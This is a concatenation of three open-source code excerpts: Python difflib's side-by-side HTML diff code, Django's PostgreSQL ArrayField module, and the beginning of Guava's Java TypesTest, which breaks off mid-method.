# intraline change
yield _make_line(lines,None,0), _make_line(lines,'?',1), True
continue
elif s.startswith('-?+'):
# intraline change
yield _make_line(lines,'?',0), _make_line(lines,None,1), True
continue
elif s.startswith('-'):
# delete FROM line
num_blanks_pending -= 1
yield _make_line(lines,'-',0), None, True
continue
elif s.startswith('+--'):
# in add block, delete block coming: we do NOT want to get
# caught up on blank lines yet, just process the add line
num_blanks_pending += 1
yield None, _make_line(lines,'+',1), True
continue
elif s.startswith(('+ ', '+-')):
# will be leaving an add block: yield blanks then add line
from_line, to_line = None, _make_line(lines,'+',1)
num_blanks_to_yield,num_blanks_pending = num_blanks_pending+1,0
elif s.startswith('+'):
# inside an add block, yield the add line
num_blanks_pending += 1
yield None, _make_line(lines,'+',1), True
continue
elif s.startswith(' '):
# unchanged text, yield it to both sides
yield _make_line(lines[:],None,0),_make_line(lines,None,1),False
continue
# Catch up on the blank lines so when we yield the next from/to
# pair, they are lined up.
while(num_blanks_to_yield < 0):
num_blanks_to_yield += 1
yield None,('','\n'),True
while(num_blanks_to_yield > 0):
num_blanks_to_yield -= 1
yield ('','\n'),None,True
if s.startswith('X'):
raise StopIteration
else:
yield from_line,to_line,True
def _line_pair_iterator():
"""Yields from/to lines of text with a change indication.
This function is an iterator. It itself pulls lines from the line
iterator. Its difference from that iterator is that this function
always yields a pair of from/to text lines (with the change
indication). If necessary it will collect single from/to lines
until it has a matching pair from/to pair to yield.
Note, this function is purposefully not defined at the module scope so
that data it needs from its parent function (within whose context it
is defined) does not need to be of module scope.
"""
line_iterator = _line_iterator()
fromlines,tolines=[],[]
while True:
# Collecting lines of text until we have a from/to pair
while (len(fromlines)==0 or len(tolines)==0):
from_line, to_line, found_diff = next(line_iterator)
if from_line is not None:
fromlines.append((from_line,found_diff))
if to_line is not None:
tolines.append((to_line,found_diff))
# Once we have a pair, remove them from the collection and yield it
from_line, fromDiff = fromlines.pop(0)
to_line, to_diff = tolines.pop(0)
yield (from_line,to_line,fromDiff or to_diff)
# Handle case where user does not want context differencing, just yield
# them up without doing anything else with them.
line_pair_iterator = _line_pair_iterator()
if context is None:
while True:
yield next(line_pair_iterator)
# Handle case where user wants context differencing. We must do some
# storage of lines until we know for sure that they are to be yielded.
else:
context += 1
lines_to_write = 0
while True:
# Store lines up until we find a difference, note use of a
# circular queue because we only need to keep around what
# we need for context.
index, contextLines = 0, [None]*(context)
found_diff = False
while(found_diff is False):
from_line, to_line, found_diff = next(line_pair_iterator)
i = index % context
contextLines[i] = (from_line, to_line, found_diff)
index += 1
# Yield lines that we have collected so far, but first yield
# the user's separator.
if index > context:
yield None, None, None
lines_to_write = context
else:
lines_to_write = index
index = 0
while(lines_to_write):
i = index % context
index += 1
yield contextLines[i]
lines_to_write -= 1
# Now yield the context lines after the change
lines_to_write = context-1
while(lines_to_write):
from_line, to_line, found_diff = next(line_pair_iterator)
# If another change within the context, extend the context
if found_diff:
lines_to_write = context-1
else:
lines_to_write -= 1
yield from_line, to_line, found_diff
_file_template = """
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type"
content="text/html; charset=ISO-8859-1" />
<title></title>
<style type="text/css">%(styles)s
</style>
</head>
<body>
%(table)s%(legend)s
</body>
</html>"""
_styles = """
table.diff {font-family:Courier; border:medium;}
.diff_header {background-color:#e0e0e0}
td.diff_header {text-align:right}
.diff_next {background-color:#c0c0c0}
.diff_add {background-color:#aaffaa}
.diff_chg {background-color:#ffff77}
.diff_sub {background-color:#ffaaaa}"""
_table_template = """
<table class="diff" id="difflib_chg_%(prefix)s_top"
cellspacing="0" cellpadding="0" rules="groups" >
<colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>
<colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>
%(header_row)s
<tbody>
%(data_rows)s </tbody>
</table>"""
_legend = """
<table class="diff" summary="Legends">
<tr> <th colspan="2"> Legends </th> </tr>
<tr> <td> <table border="" summary="Colors">
<tr><th> Colors </th> </tr>
<tr><td class="diff_add"> Added </td></tr>
<tr><td class="diff_chg">Changed</td> </tr>
<tr><td class="diff_sub">Deleted</td> </tr>
</table></td>
<td> <table border="" summary="Links">
<tr><th colspan="2"> Links </th> </tr>
<tr><td>(f)irst change</td> </tr>
<tr><td>(n)ext change</td> </tr>
<tr><td>(t)op</td> </tr>
</table></td> </tr>
</table>"""
class HtmlDiff(object):
"""For producing HTML side by side comparison with change highlights.
This class can be used to create an HTML table (or a complete HTML file
containing the table) showing a side by side, line by line comparison
of text with inter-line and intra-line change highlights. The table can
be generated in either full or contextual difference mode.
The following methods are provided for HTML generation:
make_table -- generates HTML for a single side by side table
make_file -- generates complete HTML file with a single side by side table
See tools/scripts/diff.py for an example usage of this class.
"""
_file_template = _file_template
_styles = _styles
_table_template = _table_template
_legend = _legend
_default_prefix = 0
def __init__(self,tabsize=8,wrapcolumn=None,linejunk=None,
charjunk=IS_CHARACTER_JUNK):
"""HtmlDiff instance initializer
Arguments:
tabsize -- tab stop spacing, defaults to 8.
wrapcolumn -- column number where lines are broken and wrapped,
defaults to None where lines are not wrapped.
linejunk,charjunk -- keyword arguments passed into ndiff() (used to by
HtmlDiff() to generate the side by side HTML differences). See
ndiff() documentation for argument default values and descriptions.
"""
self._tabsize = tabsize
self._wrapcolumn = wrapcolumn
self._linejunk = linejunk
self._charjunk = charjunk
def make_file(self,fromlines,tolines,fromdesc='',todesc='',context=False,
numlines=5):
"""Returns HTML file of side by side comparison with change highlights
Arguments:
fromlines -- list of "from" lines
tolines -- list of "to" lines
fromdesc -- "from" file column header string
todesc -- "to" file column header string
context -- set to True for contextual differences (defaults to False
which shows full differences).
numlines -- number of context lines. When context is set True,
controls number of lines displayed before and after the change.
When context is False, controls the number of lines to place
the "next" link anchors before the next change (so click of
"next" link jumps to just before the change).
"""
return self._file_template % dict(
styles = self._styles,
legend = self._legend,
table = self.make_table(fromlines,tolines,fromdesc,todesc,
context=context,numlines=numlines))
def _tab_newline_replace(self,fromlines,tolines):
"""Returns from/to line lists with tabs expanded and newlines removed.
Instead of tab characters being replaced by the number of spaces
needed to fill in to the next tab stop, this function will fill
the space with tab characters. This is done so that the difference
algorithms can identify changes in a file when tabs are replaced by
spaces and vice versa. At the end of the HTML generation, the tab
characters will be replaced with a nonbreakable space.
"""
def expand_tabs(line):
# hide real spaces
line = line.replace(' ','\0')
# expand tabs into spaces
line = line.expandtabs(self._tabsize)
# replace spaces from expanded tabs back into tab characters
# (we'll replace them with markup after we do differencing)
line = line.replace(' ','\t')
return line.replace('\0',' ').rstrip('\n')
fromlines = [expand_tabs(line) for line in fromlines]
tolines = [expand_tabs(line) for line in tolines]
return fromlines,tolines
def _split_line(self,data_list,line_num,text):
"""Builds list of text lines by splitting text lines at wrap point
This function will determine if the input text line needs to be
wrapped (split) into separate lines. If so, the first wrap point
will be determined and the first line appended to the output
text line list. This function is used recursively to handle
the second part of the split line to further split it.
"""
# if blank line or context separator, just add it to the output list
if not line_num:
data_list.append((line_num,text))
return
# if line text doesn't need wrapping, just add it to the output list
size = len(text)
max = self._wrapcolumn
if (size <= max) or ((size -(text.count('\0')*3)) <= max):
data_list.append((line_num,text))
return
# scan text looking for the wrap point, keeping track if the wrap
# point is inside markers
i = 0
n = 0
mark = ''
while n < max and i < size:
if text[i] == '\0':
i += 1
mark = text[i]
i += 1
elif text[i] == '\1':
i += 1
mark = ''
else:
i += 1
n += 1
# wrap point is inside text, break it up into separate lines
line1 = text[:i]
line2 = text[i:]
# if wrap point is inside markers, place end marker at end of first
# line and start marker at beginning of second line because each
# line will have its own table tag markup around it.
if mark:
line1 = line1 + '\1'
line2 = '\0' + mark + line2
# tack on first line onto the output list
data_list.append((line_num,line1))
# use this routine again to wrap the remaining text
self._split_line(data_list,'>',line2)
def _line_wrapper(self,diffs):
"""Returns iterator that splits (wraps) mdiff text lines"""
# pull from/to data and flags from mdiff iterator
for fromdata,todata,flag in diffs:
# check for context separators and pass them through
if flag is None:
yield fromdata,todata,flag
continue
(fromline,fromtext),(toline,totext) = fromdata,todata
# for each from/to line split it at the wrap column to form
# list of text lines.
fromlist,tolist = [],[]
self._split_line(fromlist,fromline,fromtext)
self._split_line(tolist,toline,totext)
# yield from/to line in pairs inserting blank lines as
# necessary when one side has more wrapped lines
while fromlist or tolist:
if fromlist:
fromdata = fromlist.pop(0)
else:
fromdata = ('',' ')
if tolist:
todata = tolist.pop(0)
else:
todata = ('',' ')
yield fromdata,todata,flag
def _collect_lines(self,diffs):
"""Collects mdiff output into separate lists
Before storing the mdiff from/to data into a list, it is converted
into a single line of text with HTML markup.
"""
fromlist,tolist,flaglist = [],[],[]
# pull from/to data and flags from mdiff style iterator
for fromdata,todata,flag in diffs:
try:
# store HTML markup of the lines into the lists
fromlist.append(self._format_line(0,flag,*fromdata))
tolist.append(self._format_line(1,flag,*todata))
except TypeError:
# exceptions occur for lines where context separators go
fromlist.append(None)
tolist.append(None)
flaglist.append(flag)
return fromlist,tolist,flaglist
def _format_line(self,side,flag,linenum,text):
"""Returns HTML markup of "from" / "to" text lines
side -- 0 or 1 indicating "from" or "to" text
flag -- indicates if difference on line
linenum -- line number (used for line number column)
text -- line text to be marked up
"""
try:
linenum = '%d' % linenum
id = ' id="%s%s"' % (self._prefix[side],linenum)
except TypeError:
# handle blank lines where linenum is '>' or ''
id = ''
# replace those things that would get confused with HTML symbols
text=text.replace("&","&").replace(">",">").replace("<","<")
# make space non-breakable so they don't get compressed or line wrapped
text = text.replace(' ',' ').rstrip()
return '<td class="diff_header"%s>%s</td><td nowrap="nowrap">%s</td>' \
% (id,linenum,text)
def _make_prefix(self):
"""Create unique anchor prefixes"""
# Generate a unique anchor prefix so multiple tables
# can exist on the same HTML page without conflicts.
fromprefix = "from%d_" % HtmlDiff._default_prefix
toprefix = "to%d_" % HtmlDiff._default_prefix
HtmlDiff._default_prefix += 1
# store prefixes so line format method has access
self._prefix = [fromprefix,toprefix]
def _convert_flags(self,fromlist,tolist,flaglist,context,numlines):
"""Makes list of "next" links"""
# all anchor names will be generated using the unique "to" prefix
toprefix = self._prefix[1]
# process change flags, generating middle column of next anchors/links
next_id = ['']*len(flaglist)
next_href = ['']*len(flaglist)
num_chg, in_change = 0, False
last = 0
for i,flag in enumerate(flaglist):
if flag:
if not in_change:
in_change = True
last = i
# at the beginning of a change, drop an anchor a few lines
# (the context lines) before the change for the previous
# link
i = max([0,i-numlines])
next_id[i] = ' id="difflib_chg_%s_%d"' % (toprefix,num_chg)
# at the beginning of a change, drop a link to the next
# change
num_chg += 1
next_href[last] = '<a href="#difflib_chg_%s_%d">n</a>' % (
toprefix,num_chg)
else:
in_change = False
# check for cases where there is no content to avoid exceptions
if not flaglist:
flaglist = [False]
next_id = ['']
next_href = ['']
last = 0
if context:
fromlist = ['<td></td><td> No Differences Found </td>']
tolist = fromlist
else:
fromlist = tolist = ['<td></td><td> Empty File </td>']
# if not a change on first line, drop a link
if not flaglist[0]:
next_href[0] = '<a href="#difflib_chg_%s_0">f</a>' % toprefix
# redo the last link to link to the top
next_href[last] = '<a href="#difflib_chg_%s_top">t</a>' % (toprefix)
return fromlist,tolist,flaglist,next_href,next_id
def make_table(self,fromlines,tolines,fromdesc='',todesc='',context=False,
numlines=5):
"""Returns HTML table of side by side comparison with change highlights
Arguments:
fromlines -- list of "from" lines
tolines -- list of "to" lines
fromdesc -- "from" file column header string
todesc -- "to" file column header string
context -- set to True for contextual differences (defaults to False
which shows full differences).
numlines -- number of context lines. When context is set True,
controls number of lines displayed before and after the change.
When context is False, controls the number of lines to place
the "next" link anchors before the next change (so click of
"next" link jumps to just before the change).
"""
# make unique anchor prefixes so that multiple tables may exist
# on the same page without conflict.
self._make_prefix()
# change tabs to spaces before it gets more difficult after we insert
# markkup
fromlines,tolines = self._tab_newline_replace(fromlines,tolines)
# create diffs iterator which generates side by side from/to data
if context:
context_lines = numlines
else:
context_lines = None
diffs = _mdiff(fromlines,tolines,context_lines,linejunk=self._linejunk,
charjunk=self._charjunk)
# set up iterator to wrap lines that exceed desired width
if self._wrapcolumn:
diffs = self._line_wrapper(diffs)
# collect up from/to lines and flags into lists (also format the lines)
fromlist,tolist,flaglist = self._collect_lines(diffs)
# process change flags, generating middle column of next anchors/links
fromlist,tolist,flaglist,next_href,next_id = self._convert_flags(
fromlist,tolist,flaglist,context,numlines)
s = []
fmt = ' <tr><td class="diff_next"%s>%s</td>%s' + \
'<td class="diff_next">%s</td>%s</tr>\n'
for i in range(len(flaglist)):
if flaglist[i] is None:
# mdiff yields None on separator lines skip the bogus ones
# generated for the first line
if i > 0:
s.append(' </tbody> \n <tbody>\n')
else:
s.append( fmt % (next_id[i],next_href[i],fromlist[i],
next_href[i],tolist[i]))
if fromdesc or todesc:
header_row = '<thead><tr>%s%s%s%s</tr></thead>' % (
'<th class="diff_next"><br /></th>',
'<th colspan="2" class="diff_header">%s</th>' % fromdesc,
'<th class="diff_next"><br /></th>',
'<th colspan="2" class="diff_header">%s</th>' % todesc)
else:
header_row = ''
table = self._table_template % dict(
data_rows=''.join(s),
header_row=header_row,
prefix=self._prefix[1])
return table.replace('\0+','<span class="diff_add">'). \
replace('\0-','<span class="diff_sub">'). \
replace('\0^','<span class="diff_chg">'). \
replace('\1','</span>'). \
replace('\t',' ')
del re
def restore(delta, which):
r"""
Generate one of the two sequences that generated a delta.
Given a `delta` produced by `Differ.compare()` or `ndiff()`, extract
lines originating from file 1 or 2 (parameter `which`), stripping off line
prefixes.
Examples:
>>> diff = ndiff('one\ntwo\nthree\n'.splitlines(1),
... 'ore\ntree\nemu\n'.splitlines(1))
>>> diff = list(diff)
>>> print(''.join(restore(diff, 1)), end="")
one
two
three
>>> print(''.join(restore(diff, 2)), end="")
ore
tree
emu
"""
try:
tag = {1: "- ", 2: "+ "}[int(which)]
except KeyError:
raise ValueError('unknown delta choice (must be 1 or 2): %r'
% which)
prefixes = (" ", tag)
for line in delta:
if line[:2] in prefixes:
yield line[2:]
def _test():
import doctest, difflib
return doctest.testmod(difflib)
if __name__ == "__main__":
_test() | unknown | codeparrot/codeparrot-clean | ||
import json
from django.contrib.postgres import lookups
from django.contrib.postgres.forms import SimpleArrayField
from django.contrib.postgres.validators import ArrayMaxLengthValidator
from django.core import checks, exceptions
from django.db.models import Field, IntegerField, Transform
from django.db.models.lookups import Exact, In
from django.utils.translation import gettext_lazy as _
from ..utils import prefix_validation_error
from .utils import AttributeSetter
__all__ = ['ArrayField']
class ArrayField(Field):
empty_strings_allowed = False
default_error_messages = {
'item_invalid': _('Item %(nth)s in the array did not validate: '),
'nested_array_mismatch': _('Nested arrays must have the same length.'),
}
def __init__(self, base_field, size=None, **kwargs):
self.base_field = base_field
self.size = size
if self.size:
self.default_validators = self.default_validators[:]
self.default_validators.append(ArrayMaxLengthValidator(self.size))
# For performance, only add a from_db_value() method if the base field
# implements it.
if hasattr(self.base_field, 'from_db_value'):
self.from_db_value = self._from_db_value
super().__init__(**kwargs)
@property
def model(self):
try:
return self.__dict__['model']
except KeyError:
raise AttributeError("'%s' object has no attribute 'model'" % self.__class__.__name__)
@model.setter
def model(self, model):
self.__dict__['model'] = model
self.base_field.model = model
def check(self, **kwargs):
errors = super().check(**kwargs)
if self.base_field.remote_field:
errors.append(
checks.Error(
'Base field for array cannot be a related field.',
obj=self,
id='postgres.E002'
)
)
else:
# Remove the field name checks as they are not needed here.
base_errors = self.base_field.check()
if base_errors:
messages = '\n '.join('%s (%s)' % (error.msg, error.id) for error in base_errors)
errors.append(
checks.Error(
'Base field for array has errors:\n %s' % messages,
obj=self,
id='postgres.E001'
)
)
return errors
def set_attributes_from_name(self, name):
super().set_attributes_from_name(name)
self.base_field.set_attributes_from_name(name)
@property
def description(self):
return 'Array of %s' % self.base_field.description
def db_type(self, connection):
size = self.size or ''
return '%s[%s]' % (self.base_field.db_type(connection), size)
def get_db_prep_value(self, value, connection, prepared=False):
if isinstance(value, list) or isinstance(value, tuple):
return [self.base_field.get_db_prep_value(i, connection, prepared=False) for i in value]
return value
def deconstruct(self):
name, path, args, kwargs = super().deconstruct()
if path == 'django.contrib.postgres.fields.array.ArrayField':
path = 'django.contrib.postgres.fields.ArrayField'
kwargs.update({
'base_field': self.base_field.clone(),
'size': self.size,
})
return name, path, args, kwargs
def to_python(self, value):
if isinstance(value, str):
# Assume we're deserializing
vals = json.loads(value)
value = [self.base_field.to_python(val) for val in vals]
return value
def _from_db_value(self, value, expression, connection, context):
if value is None:
return value
return [
self.base_field.from_db_value(item, expression, connection, context)
for item in value
]
def value_to_string(self, obj):
values = []
vals = self.value_from_object(obj)
base_field = self.base_field
for val in vals:
if val is None:
values.append(None)
else:
obj = AttributeSetter(base_field.attname, val)
values.append(base_field.value_to_string(obj))
return json.dumps(values)
def get_transform(self, name):
transform = super().get_transform(name)
if transform:
return transform
if '_' not in name:
try:
index = int(name)
except ValueError:
pass
else:
index += 1 # postgres uses 1-indexing
return IndexTransformFactory(index, self.base_field)
try:
start, end = name.split('_')
start = int(start) + 1
end = int(end) # don't add one here because postgres slices are weird
except ValueError:
pass
else:
return SliceTransformFactory(start, end)
def validate(self, value, model_instance):
super().validate(value, model_instance)
for index, part in enumerate(value):
try:
self.base_field.validate(part, model_instance)
except exceptions.ValidationError as error:
raise prefix_validation_error(
error,
prefix=self.error_messages['item_invalid'],
code='item_invalid',
params={'nth': index},
)
if isinstance(self.base_field, ArrayField):
if len({len(i) for i in value}) > 1:
raise exceptions.ValidationError(
self.error_messages['nested_array_mismatch'],
code='nested_array_mismatch',
)
def run_validators(self, value):
super().run_validators(value)
for index, part in enumerate(value):
try:
self.base_field.run_validators(part)
except exceptions.ValidationError as error:
raise prefix_validation_error(
error,
prefix=self.error_messages['item_invalid'],
code='item_invalid',
params={'nth': index},
)
def formfield(self, **kwargs):
defaults = {
'form_class': SimpleArrayField,
'base_field': self.base_field.formfield(),
'max_length': self.size,
}
defaults.update(kwargs)
return super().formfield(**defaults)
@ArrayField.register_lookup
class ArrayContains(lookups.DataContains):
def as_sql(self, qn, connection):
sql, params = super().as_sql(qn, connection)
sql = '%s::%s' % (sql, self.lhs.output_field.db_type(connection))
return sql, params
@ArrayField.register_lookup
class ArrayContainedBy(lookups.ContainedBy):
def as_sql(self, qn, connection):
sql, params = super().as_sql(qn, connection)
sql = '%s::%s' % (sql, self.lhs.output_field.db_type(connection))
return sql, params
@ArrayField.register_lookup
class ArrayExact(Exact):
def as_sql(self, qn, connection):
sql, params = super().as_sql(qn, connection)
sql = '%s::%s' % (sql, self.lhs.output_field.db_type(connection))
return sql, params
@ArrayField.register_lookup
class ArrayOverlap(lookups.Overlap):
def as_sql(self, qn, connection):
sql, params = super().as_sql(qn, connection)
sql = '%s::%s' % (sql, self.lhs.output_field.db_type(connection))
return sql, params
@ArrayField.register_lookup
class ArrayLenTransform(Transform):
lookup_name = 'len'
output_field = IntegerField()
def as_sql(self, compiler, connection):
lhs, params = compiler.compile(self.lhs)
# Distinguish NULL and empty arrays
return (
'CASE WHEN %(lhs)s IS NULL THEN NULL ELSE '
'coalesce(array_length(%(lhs)s, 1), 0) END'
) % {'lhs': lhs}, params
@ArrayField.register_lookup
class ArrayInLookup(In):
def get_prep_lookup(self):
values = super().get_prep_lookup()
# In.process_rhs() expects values to be hashable, so convert lists
# to tuples.
prepared_values = []
for value in values:
if hasattr(value, 'resolve_expression'):
prepared_values.append(value)
else:
prepared_values.append(tuple(value))
return prepared_values
class IndexTransform(Transform):
def __init__(self, index, base_field, *args, **kwargs):
super().__init__(*args, **kwargs)
self.index = index
self.base_field = base_field
def as_sql(self, compiler, connection):
lhs, params = compiler.compile(self.lhs)
return '%s[%s]' % (lhs, self.index), params
@property
def output_field(self):
return self.base_field
class IndexTransformFactory:
def __init__(self, index, base_field):
self.index = index
self.base_field = base_field
def __call__(self, *args, **kwargs):
return IndexTransform(self.index, self.base_field, *args, **kwargs)
class SliceTransform(Transform):
def __init__(self, start, end, *args, **kwargs):
super().__init__(*args, **kwargs)
self.start = start
self.end = end
def as_sql(self, compiler, connection):
lhs, params = compiler.compile(self.lhs)
return '%s[%s:%s]' % (lhs, self.start, self.end), params
class SliceTransformFactory:
def __init__(self, start, end):
self.start = start
self.end = end
def __call__(self, *args, **kwargs):
return SliceTransform(self.start, self.end, *args, **kwargs) | unknown | codeparrot/codeparrot-clean | ||
/*
* Copyright (C) 2011 The Guava Authors
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.google.common.reflect;
import static com.google.common.truth.Truth.assertThat;
import static java.util.Arrays.asList;
import static org.junit.Assert.assertThrows;
import com.google.common.collect.Lists;
import com.google.common.testing.EqualsTester;
import com.google.common.testing.NullPointerTester;
import com.google.common.testing.NullPointerTester.Visibility;
import com.google.common.testing.SerializableTester;
import com.google.errorprone.annotations.CanIgnoreReturnValue;
import java.lang.reflect.GenericArrayType;
import java.lang.reflect.GenericDeclaration;
import java.lang.reflect.ParameterizedType;
import java.lang.reflect.Type;
import java.lang.reflect.TypeVariable;
import java.lang.reflect.WildcardType;
import java.util.Arrays;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.Map.Entry;
import junit.framework.TestCase;
import org.jspecify.annotations.NullUnmarked;
/**
* Tests for {@link Types}.
*
* @author Ben Yu
*/
@AndroidIncompatible // lots of failures, possibly some related to bad equals() implementations?
@NullUnmarked
public class TypesTest extends TestCase {
public void testNewParameterizedType_ownerTypeImplied() throws Exception {
ParameterizedType jvmType =
(ParameterizedType) new TypeCapture<Entry<String, Integer>>() {}.capture();
ParameterizedType ourType =
Types.newParameterizedType(Entry.class, String.class, Integer.class);
assertEquals(jvmType, ourType);
assertEquals(Map.class, ourType.getOwnerType());
}
public void testNewParameterizedType() {
ParameterizedType jvmType =
(ParameterizedType) new TypeCapture<HashMap<String, int[][]>>() {}.capture();
ParameterizedType ourType =
Types.newParameterizedType(HashMap.class, String.class, int[][].class);
new EqualsTester().addEqualityGroup(jvmType, ourType).testEquals();
assertEquals(jvmType.toString(), ourType.toString());
assertEquals(jvmType.hashCode(), ourType.hashCode());
assertEquals(HashMap.class, ourType.getRawType());
assertThat(ourType.getActualTypeArguments())
.asList()
.containsExactlyElementsIn(asList(jvmType.getActualTypeArguments()))
.inOrder();
assertEquals(
Arrays.asList(String.class, Types.newArrayType(Types.newArrayType(int.class))),
Arrays.asList(ourType.getActualTypeArguments()));
assertEquals(null, ourType.getOwnerType());
}
public void testNewParameterizedType_nonStaticLocalClass() {
class LocalClass<T> {}
Type jvmType = new LocalClass<String>() {}.getClass().getGenericSuperclass();
Type ourType = Types.newParameterizedType(LocalClass.class, String.class);
assertEquals(jvmType, ourType);
}
public void testNewParameterizedType_staticLocalClass() {
doTestNewParameterizedTypeStaticLocalClass();
}
private static void doTestNewParameterizedTypeStaticLocalClass() {
class LocalClass<T> {}
Type jvmType = new LocalClass<String>() {}.getClass().getGenericSuperclass();
Type ourType = Types.newParameterizedType(LocalClass.class, String.class);
assertEquals(jvmType, ourType);
}
public void testNewParameterizedTypeWithOwner() {
ParameterizedType jvmType =
(ParameterizedType) new TypeCapture<Entry<String, int[][]>>() {}.capture();
ParameterizedType ourType =
Types.newParameterizedTypeWithOwner(Map.class, Entry.class, String.class, int[][].class);
new EqualsTester()
.addEqualityGroup(jvmType, ourType)
.addEqualityGroup(new TypeCapture<Entry<String, String>>() {}.capture())
.addEqualityGroup(new TypeCapture<Map<String, Integer>>() {}.capture())
.testEquals();
assertEquals(jvmType.toString(), ourType.toString());
assertEquals(Map.class, ourType.getOwnerType());
assertEquals(Entry.class, ourType.getRawType());
assertThat(ourType.getActualTypeArguments())
.asList()
.containsExactlyElementsIn(asList(jvmType.getActualTypeArguments()))
.inOrder();
}
public void testNewParameterizedType_serializable() {
SerializableTester.reserializeAndAssert(
Types.newParameterizedType(Entry.class, String.class, Integer.class));
}
public void testNewParameterizedType_ownerMismatch() {
assertThrows(
IllegalArgumentException.class,
() -> Types.newParameterizedTypeWithOwner(Number.class, List.class, String.class));
}
public void testNewParameterizedType_ownerMissing() {
assertEquals(
Types.newParameterizedType(Entry.class, String.class, Integer.class),
Types.newParameterizedTypeWithOwner(null, Entry.class, String.class, Integer.class));
}
public void testNewParameterizedType_invalidTypeParameters() {
assertThrows(
IllegalArgumentException.class,
() -> Types.newParameterizedTypeWithOwner(Map.class, Entry.class, String.class));
}
public void testNewParameterizedType_primitiveTypeParameters() {
assertThrows(
IllegalArgumentException.class,
() -> Types.newParameterizedTypeWithOwner(Map.class, Entry.class, int.class, int.class));
}
public void testNewArrayType() {
Type jvmType1 = new TypeCapture<List<String>[]>() {}.capture();
GenericArrayType ourType1 =
(GenericArrayType) Types.newArrayType(Types.newParameterizedType(List.class, String.class));
@SuppressWarnings("rawtypes") // test of raw types
Type jvmType2 = new TypeCapture<List[]>() {}.capture();
Type ourType2 = Types.newArrayType(List.class);
new EqualsTester()
.addEqualityGroup(jvmType1, ourType1)
.addEqualityGroup(jvmType2, ourType2)
.testEquals();
assertEquals(new TypeCapture<List<String>>() {}.capture(), ourType1.getGenericComponentType());
assertEquals(jvmType1.toString(), ourType1.toString());
assertEquals(jvmType2.toString(), ourType2.toString());
}
public void testNewArrayTypeOfArray() {
Type jvmType = new TypeCapture<int[][]>() {}.capture();
Type ourType = Types.newArrayType(int[].class);
assertEquals(jvmType.toString(), ourType.toString());
new EqualsTester().addEqualityGroup(jvmType, ourType).testEquals();
}
public void testNewArrayType_primitive() {
Type jvmType = new TypeCapture<int[]>() {}.capture();
Type ourType = Types.newArrayType(int.class);
assertEquals(jvmType.toString(), ourType.toString());
new EqualsTester().addEqualityGroup(jvmType, ourType).testEquals();
}
public void testNewArrayType_upperBoundedWildcard() {
Type wildcard = Types.subtypeOf(Number.class);
assertEquals(Types.subtypeOf(Number[].class), Types.newArrayType(wildcard));
}
public void testNewArrayType_lowerBoundedWildcard() {
Type wildcard = Types.supertypeOf(Number.class);
assertEquals(Types.supertypeOf(Number[].class), Types.newArrayType(wildcard));
}
public void testNewArrayType_serializable() {
SerializableTester.reserializeAndAssert(Types.newArrayType(int[].class));
}
private static class WithWildcardType {
@SuppressWarnings("unused")
void withoutBound(List<?> list) {}
@SuppressWarnings("unused")
void withObjectBound(List<? extends Object> list) {}
@SuppressWarnings("unused")
void withUpperBound(List<? extends int[][]> list) {}
@SuppressWarnings("unused")
void withLowerBound(List<? super String[][]> list) {}
static WildcardType getWildcardType(String methodName) throws Exception {
ParameterizedType parameterType =
(ParameterizedType)
WithWildcardType.class.getDeclaredMethod(methodName, List.class)
.getGenericParameterTypes()[0];
return (WildcardType) parameterType.getActualTypeArguments()[0];
}
}
public void testNewWildcardType() throws Exception {
WildcardType noBoundJvmType = WithWildcardType.getWildcardType("withoutBound");
WildcardType objectBoundJvmType = WithWildcardType.getWildcardType("withObjectBound");
WildcardType upperBoundJvmType = WithWildcardType.getWildcardType("withUpperBound");
WildcardType lowerBoundJvmType = WithWildcardType.getWildcardType("withLowerBound");
WildcardType objectBound = Types.subtypeOf(Object.class);
WildcardType upperBound = Types.subtypeOf(int[][].class);
WildcardType lowerBound = Types.supertypeOf(String[][].class);
assertEqualWildcardType(noBoundJvmType, objectBound);
assertEqualWildcardType(objectBoundJvmType, objectBound);
assertEqualWildcardType(upperBoundJvmType, upperBound);
assertEqualWildcardType(lowerBoundJvmType, lowerBound);
new EqualsTester()
.addEqualityGroup(noBoundJvmType, objectBoundJvmType, objectBound)
.addEqualityGroup(upperBoundJvmType, upperBound)
.addEqualityGroup(lowerBoundJvmType, lowerBound)
.testEquals();
}
public void testNewWildcardType_primitiveTypeBound() {
assertThrows(IllegalArgumentException.class, () -> Types.subtypeOf(int.class));
}
public void testNewWildcardType_serializable() {
SerializableTester.reserializeAndAssert(Types.supertypeOf(String.class));
SerializableTester.reserializeAndAssert(Types.subtypeOf(String.class));
SerializableTester.reserializeAndAssert(Types.subtypeOf(Object.class));
}
private static void assertEqualWildcardType(WildcardType expected, WildcardType actual) {
assertEquals(expected.toString(), actual.toString());
assertEquals(actual.toString(), expected.hashCode(), actual.hashCode());
assertThat(actual.getLowerBounds())
.asList()
.containsExactlyElementsIn(asList(expected.getLowerBounds()))
.inOrder();
assertThat(actual.getUpperBounds())
.asList()
.containsExactlyElementsIn(asList(expected.getUpperBounds()))
.inOrder();
}
private static class WithTypeVariable {
@SuppressWarnings("unused")
<T> void withoutBound(List<T> list) {}
@SuppressWarnings({
"unused",
/*
* Since reflection can't tell the difference between <T> and <T extends Object>, it doesn't
* make a ton of sense to have a separate tests for each. But having tests for each doesn't
* really hurt anything, and maybe it will serve a purpose in a future in which Java has a
* built-in nullness feature?
*/
"ExtendsObject",
})
<T extends Object> void withObjectBound(List<T> list) {}
@SuppressWarnings("unused")
<T extends Number & CharSequence> void withUpperBound(List<T> list) {}
static TypeVariable<?> getTypeVariable(String methodName) throws Exception {
ParameterizedType parameterType =
(ParameterizedType)
WithTypeVariable.class.getDeclaredMethod(methodName, List.class)
.getGenericParameterTypes()[0];
return (TypeVariable<?>) parameterType.getActualTypeArguments()[0];
}
}
public void testNewTypeVariable() throws Exception {
TypeVariable<?> noBoundJvmType = WithTypeVariable.getTypeVariable("withoutBound");
